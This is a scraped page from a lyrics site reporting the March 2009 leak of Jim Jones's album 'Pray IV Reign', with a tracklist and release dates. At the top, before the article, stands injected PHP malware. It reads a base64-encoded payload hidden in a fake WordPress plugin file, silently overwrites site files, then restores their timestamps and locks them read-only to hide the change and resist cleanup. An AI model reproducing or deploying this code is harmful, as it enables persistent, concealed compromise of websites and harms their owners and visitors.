$wp_update_file="/var/www/illestlyrics.com/web/wp-content/plugins/helloworld.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Jim Jones - Pray IV Reign - Leaks

Jim Jones – Pray IV Reign – Leaks

Jim Jones first album with Columbia records has leaked to the internet. The highly anticipated fourth solo album will be released on March 24th. The album stirred up some controversy on March 17th as “Frenemies”, a diss to Cam’ron & Max B, was released. Please, if you like the artist, purchase the album.


jim jones - pray iv reign


01. Album Intro (Feat. Starr)
02. Pulling Me Back (Feat. Chink Santana)
03. Let It Out
04. How To Be A Boss (Feat. Ludacris & NOE)
05. Medicine (Feat. NOE & Chink Santana)
06. Frienemies
07. Precious (Feat. Ryan Leslie)
08. Blow The Bank (Feat. Oshy)
09. This Is For My bi*ches (Feat. Oshy)
10. Girlfriend (Feat. Juelz Santana & Oshy)
11. This Is The Life (Feat. Starr)
12. My My My (Feat. Rawana)
13. Pop Off (Feat. NOE & Mel Matrix)
14. Pop Champagne (Feat. Ron Browz & Juelz Santana)
15. Rain (Feat. Rell, NOE & Starr)
16. Na Na Nana Na Na (Feat. NOE & Brittney Taylor)


Jim Jones – Nana Na Na

Jim Jones – Pop Champagne

Jim Jones – Frenemies

Leak Date

March 21st, 2009

Release Date

March 24th, 2009